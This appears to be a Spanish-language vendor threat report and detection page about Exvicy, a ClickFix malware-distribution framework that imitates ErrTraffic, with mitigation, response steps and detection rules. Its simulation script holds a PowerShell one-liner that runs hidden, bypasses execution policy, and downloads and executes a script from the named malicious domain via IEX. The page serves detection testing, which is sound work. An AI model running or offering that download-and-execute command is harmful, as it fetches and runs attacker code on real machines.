Exvicy: Un imitador del marco de distribución de malware ErrTraffic
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Exvicy es un marco de distribución emergente de Malware-as-a-Service (MaaS) ClickFix promocionado en foros de cibercrimen. Utiliza ingeniería social imitando los desafíos de Turnstile de Cloudflare para convencer a los usuarios de ejecutar comandos maliciosos de PowerShell a través del cuadro de diálogo Ejecutar de Windows. El marco copia de cerca a ErrTraffic, reutilizando grandes porciones de su código base JavaScript y técnicas de ofuscación.
Investigación
Analistas de TDR se conectaron a partir de una captura de pantalla de un panel de administración compartida en el foro Exploit.IN para descubrir infraestructura C2 activa. Analizando nombres de servidor específicos de Cloudflare y patrones de registro de dominios, los investigadores identificaron múltiples dominios maliciosos y sitios web de WordPress comprometidos. El análisis técnico confirmó un amplio reutilizamiento del código de ErrTraffic, incluyendo funciones distintivas de JavaScript y lógica anti-análisis.
Mitigación
Las organizaciones deben desplegar un filtrado web robusto para bloquear dominios maliciosos conocidos y TLDs sospechosos asociados con estas campañas. La protección de endpoint debe monitorear y restringir la ejecución anómala de PowerShell, especialmente comandos que involucren irm or iex. Los usuarios también deben ser capacitados para reconocer avisos de ingeniería social que les instruyan a usar atajos de teclado como Win+R para ejecutar comandos.
Respuesta
Si se detecta actividad de Exvicy, los hosts afectados deben ser aislados inmediatamente para detener ejecución adicional de comandos o entrega de cargas útiles. Los respondientes deben revisar los registros operativos de PowerShell para identificar comandos ejecutados y conexiones de red relacionadas. Las direcciones IP y dominios C2 conocidos deben ser bloqueados en el perímetro, seguido de un barrido para otros activos de WordPress comprometidos en el entorno.
Flujo de Ataque
Todavía estamos actualizando esta parte.
Detecciones
Comando y Control Sospechoso por Solicitud de DNS de Dominio de Nivel Superior Inusual (TLD) (via dns)
Entrada Suspicious RunMRU Con Semántica de LOLBin (via registry_event)
IOCs (IP de Origen) para detectar: Exvicy: Una copia del marco de distribución de malware ErrTraffic
IOCs (IP de Destino) para detectar: Exvicy: Una copia del marco de distribución de malware ErrTraffic
Detección de Ejecución de Comandos Maliciosos de PowerShell para Malware Exvicy [Windows Powershell]
Ejecución de Comandos del Marco Exvicy a través del Atajo Win + R [Creación de Procesos de Windows]
Ejecución de Simulación
-
Narrativa del Ataque & Comandos: Un adversario entrega un atajo malicioso o documento a un usuario a través de phishing. Al ejecutarse (T1204.002), el usuario sin saberlo provoca un proceso de PowerShell (T1059.001). El objetivo del atacante es establecer un punto de apoyo descargando una carga útil secundaria. Para imitar el marco Exvicy, la línea de comandos se diseña para incluir el dominio específico conocido como malicioso
recaptcha-check.com/8E9curHNH8UfAMLzpara descargar el agente malicioso. -
Script de Prueba de Regresión:
# Script de simulación para activar la regla de detección de Exvicy. # Esto imita los patrones de línea de comandos identificados en la regla Sigma. $maliciousUrl = "http://recaptcha-check.com/8E9curHNH8UfAMLz" $command = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command `"IEX (New-Object Net.WebClient).DownloadString('$maliciousUrl')`"" Write-Host "[+] Iniciando Simulación: Ejecutando comando para activar la detección..." Start-Process powershell.exe -ArgumentList "-ExecutionPolicy Bypass -Command `"$command`"" Write-Host "[+] Comando de simulación enviado. Verificar SIEM para alertas." -
Comandos de Limpieza:
# Limpieza: No se crean archivos permanentes con esta simulación específica, # pero aseguramos que no haya procesos de PowerShell persistentes. Stop-Process -Name "powershell" -ErrorAction SilentlyContinue Write-Host "[+] Limpieza completa."